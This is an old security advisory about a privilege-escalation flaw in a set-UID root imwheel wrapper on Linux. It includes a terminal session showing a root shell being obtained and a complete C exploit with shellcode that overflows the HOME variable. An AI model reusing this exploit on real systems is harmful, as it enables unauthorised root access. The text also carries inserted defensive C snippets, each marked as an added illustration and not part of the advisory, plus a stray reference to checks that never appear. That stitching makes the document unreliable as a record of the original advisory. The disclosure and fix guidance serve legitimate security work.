COMMAND

    imwheel

SYSTEMS AFFECTED

    Any system on which the imwheel-solo wrapper script is installed set-UID root

PROBLEM

    The following is based on a TESO Security Advisory.  A vulnerability
    in the imwheel application for Linux has been discovered.  Some
    distribution packages of imwheel ship with a suid-root wrapper script
    that invokes the insecure 'imwheel' program with UID 0.

    Among the vulnerable distributions  (if the package is  installed)
    is  Halloween   Linux  Version   4  (imwheel   package  from   the
    powertools/contrib. CD).

    Tests:

        [stealth@liane stealth]$ id
        uid=500(stealth) gid=500(stealth) groups=500(stealth)
        [stealth@liane stealth]$ cd imhack/
        [stealth@liane imhack]$ stat `which imwheel-solo`
          File: "/usr/X11R6/bin/imwheel-solo"
          Size: 795          Filetype: Regular File
          Mode: (4755/-rwsr-xr-x)         Uid: (    0/    root)  Gid: (    0/    root)
        Device:  3,1   Inode: 214472    Links: 1
        Access: Mon Mar 13 17:32:22 2000(00000.00:04:38)
        Modify: Mon Nov  1 23:41:15 1999(00132.17:55:45)
        Change: Sun Mar 12 17:49:43 2000(00000.23:47:17)
        [stealth@liane imhack]$ cc imexp.c
        [stealth@liane imhack]$ ./a.out
        Creating boom-shell...
        Creating shellcode...
        You can also add an offset to the commandline.
        Get the real deal at http://www.cs.uni-potsdam.de/homepages/students/linuxer
        Respect other users privacy!
        Invoking vulnerable program (imwheel-solo)...
        imwheel is not running as a daemon.
        imwheel is not checking/writing a pid file, BE CAREFUL!
        An imwheel may be running already, two or more imwheel processes
        on the same X display, or using gpm -W, will not operate as expected!
        imwheel started (pid=1385)
        Knocking on heavens door...
        sh-2.03# id
        uid=0(root) gid=500(stealth) groups=500(stealth)
        sh-2.03#

    An attacker may gain local root access on a system where a vulnerable
    imwheel package is installed.  Even where a root shell cannot be
    obtained (for example because of a non-executable-stack patch), the
    suid-root Perl script can still be used to kill arbitrary processes.

    The suid-root Perl script 'imwheel-solo' invokes the 'imwheel' program
    with EUID 0.  Because of inaccurate bounds checking, an internal
    stack-located buffer can be overflowed by an attacker: 'imwheel' does
    not bounds-check the string it reads from the HOME environment
    variable.  Furthermore, the wrapper script, which runs privileged, can
    be fooled into sending a SIGTERM signal to arbitrary processes,
    causing them to die.  This is possible because imwheel-solo blindly
    trusts any PID given in a world-writable pid file.
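    As an added illustration (not code from the advisory or from imwheel), this is how a set-UID program can take HOME without the unchecked copy described above: the length is checked against the destination buffer before any byte is copied, and a value that fails validation is replaced by the passwd entry of the real uid rather than trusted. HOME_MAX and the function names are assumptions of this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define HOME_MAX 1024   /* constructed bound for the internal buffer; the original had none */

/* Accept $HOME only if it is absolute, printable and shorter than maxlen bytes.
 * A set-UID program must treat every environment variable as untrusted input. */
int home_is_trusted(const char *home, size_t maxlen)
{
    size_t i, n;
    if (home == NULL || home[0] != '/') return 0;
    n = strnlen(home, maxlen);
    if (n == maxlen) return 0;                    /* would not fit, terminator included */
    for (i = 0; i < n; i++)
        if (!isprint((unsigned char)home[i])) return 0;
    return 1;
}

/* Return the home directory a privileged program should use, copied with a bound
 * into a static buffer of HOME_MAX bytes: a validated $HOME, else the passwd entry
 * of the *real* uid (not the effective uid 0), else NULL. */
const char *setuid_home_n(size_t maxlen)
{
    static char dst[HOME_MAX];
    const char *home = getenv("HOME");
    if (maxlen > sizeof dst) maxlen = sizeof dst;
    if (!home_is_trusted(home, maxlen)) {
        struct passwd *pw = getpwuid(getuid());
        if (pw == NULL || !home_is_trusted(pw->pw_dir, maxlen)) return NULL;
        home = pw->pw_dir;
    }
    snprintf(dst, maxlen, "%s", home);   /* bounded copy where imwheel used an unchecked one */
    return dst;
}

const char *setuid_home(void) { return setuid_home_n(HOME_MAX); }
```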

    The bug discovery and the demonstration programs are due to S.
    Krahmer.  The shellcode is due to Stealth.  The exploit can be found
    at:

        http://www.cs.uni-potsdam.de/homepages/students/linuxer/
        http://teso.scene.at or https://teso.scene.at/
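    The pid-file flaw from the PROBLEM section, shown from the fixing side as an added example that is not part of the advisory or of imwheel-solo: a privileged wrapper that only signals a process after checking the pid file's type, owner and mode, and then the owner of the target process. The paths, result codes and function names are this example's own, and the /proc ownership check is Linux-specific.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

enum { PID_OK = 0, PID_UNREADABLE, PID_BAD_OWNER, PID_WRITABLE, PID_BAD_CONTENT, PID_NOT_OURS };
/* Read a pid from `path`, refusing what the wrapper in the advisory trusted blindly: a
 * symlink, a non-regular file, a wrong owner, or group/world-writable mode. */
int validate_pidfile(const char *path, uid_t owner, pid_t *out)
{
    struct stat st; char buf[32], *end; long pid; ssize_t n = 0;
    int fd = open(path, O_RDONLY | O_NOFOLLOW), rc = PID_OK;
    if (fd < 0) return PID_UNREADABLE;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) rc = PID_UNREADABLE;
    else if (st.st_uid != owner) rc = PID_BAD_OWNER;
    else if (st.st_mode & (S_IWGRP | S_IWOTH)) rc = PID_WRITABLE;
    if (rc == PID_OK && (n = read(fd, buf, sizeof buf - 1)) <= 0) rc = PID_BAD_CONTENT;
    close(fd);
    if (rc != PID_OK) return rc;
    buf[n] = '\0';
    errno = 0;
    pid = strtol(buf, &end, 10);          /* accept "<digits>" or "<digits>\n" only */
    if (errno || end == buf || pid <= 1 || (*end != '\0' && *end != '\n')) return PID_BAD_CONTENT;
    *out = (pid_t)pid;
    return PID_OK;
}

/* Deliver `sig` to the pid named in the file only if the file passes the checks above
 * and the target process itself belongs to `owner` (Linux-specific: owner of /proc/<pid>). */
int checked_kill(const char *path, uid_t owner, int sig)
{
    pid_t pid; char proc[64]; struct stat st;
    int rc = validate_pidfile(path, owner, &pid);
    if (rc != PID_OK) return rc;
    snprintf(proc, sizeof proc, "/proc/%ld", (long)pid);
    if (stat(proc, &st) != 0 || st.st_uid != owner) return PID_NOT_OURS;
    return kill(pid, sig) == 0 ? PID_OK : PID_NOT_OURS;
}
/* Demo helper: create a pid file with an explicit mode, independent of the umask. */
int write_pidfile(const char *path, mode_t mode, pid_t pid)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    int ok = fd >= 0 && fchmod(fd, mode) == 0 && dprintf(fd, "%ld\n", (long)pid) > 0;
    if (fd >= 0) close(fd);
    return ok ? 0 : -1;
}
```

Signal 0 is used in the checks below so that the demo verifies the target without actually terminating anything.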

    Janusz Niewiadomski posted his version of the exploit:

    /*
     *  imwheel local root exploit [ RHSA-2000:016-02 ]
     *  funkysh 04/2000 funkysh@kris.top.pl
     */

    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>   /* memset, memcpy, strlen */
    #include <unistd.h>   /* execl */

    #define BUFFER 2070
    #define NOP 0x90
    #define PATH "/usr/X11R6/bin/imwheel-solo"

    char code[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46"
                "\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
                "\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
                "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

    /* Returns the current stack pointer (i386: %eax is the return register). */
    unsigned long getesp(void) { __asm__("movl %esp,%eax"); }

    int main(int argc, char *argv[])
    {
      int i, offset = 0;
      char buf[BUFFER];
      long address;

      if(argc > 1) offset = atoi(argv[1]);   /* optional offset from the command line */
      address = getesp() + 1000 + offset;
      memset(buf,NOP,BUFFER);
      memcpy(buf+(BUFFER-300),code,strlen(code));

      for(i=(BUFFER-250);i<BUFFER;i+=4)
        *(int *)&buf[i]=address;
      setenv("DISPLAY", "DUPA", 1);
      setenv("HOME", buf, 1);                /* the overlong HOME value described above */
      execl(PATH, PATH, (char *)NULL);
      return 0;
    }

SOLUTION

    The Slackware package available from Linuxmafia.org is not affected
    by this, as it does not ship the SUID wrapper.  (The binary included
    is also not set SUID.)  This is with version 0.9.6 of imwheel.  A
    SUID wrapper should simply not be necessary in the first place.

    The standard imwheel 0.9.7 package does not have a wrapper.  However,
    during 'installation' it prompts whether or not to install SUID.  An
    excerpt from the Makefile:

        ## Setting UID, this is best for non-root usage!
        ## This does not effect usage for root users. (duh!)
        ## This gives all users kill privileges for other imwheel processes.

    Judging from that, starting imwheel from each user's xinit script and
    killing it on logout would provide the same functionality without
    SUID.  To reiterate, SUID is just a quick cop-out for a better setup.
    On a one-user desktop machine even less than that is needed.

    For Red Hat, apply the following updates via 'rpm -Fvh [filename]':

      Red Hat Powertools 6.1:
        intel: ftp://updates.redhat.com/powertools/6.1/i386/imwheel-0.9.8-1.i386.rpm
        alpha: ftp://updates.redhat.com/powertools/6.1/alpha/imwheel-0.9.8-1.alpha.rpm
        sparc: ftp://updates.redhat.com/powertools/6.1/sparc/imwheel-0.9.8-1.sparc.rpm
        sources: ftp://updates.redhat.com/powertools/6.1/SRPMS/imwheel-0.9.8-1.src.rpm

      Red Hat Powertools 6.2:
        intel: ftp://updates.redhat.com/powertools/6.2/i386/imwheel-0.9.8-1.i386.rpm
        alpha: ftp://updates.redhat.com/powertools/6.2/alpha/imwheel-0.9.8-1.alpha.rpm
        sparc: ftp://updates.redhat.com/powertools/6.2/sparc/imwheel-0.9.8-1.sparc.rpm
        sources: ftp://updates.redhat.com/powertools/6.2/SRPMS/imwheel-0.9.8-1.src.rpm

    The updated Red Hat advisory says that, because the core functionality
    of imwheel has been incorporated into many existing applications,
    removing imwheel will not incur a significant loss of functionality.
    If the machine on which imwheel is installed is not a single-user
    machine, they recommend removing imwheel.  To remove imwheel, run:

        rpm -e imwheel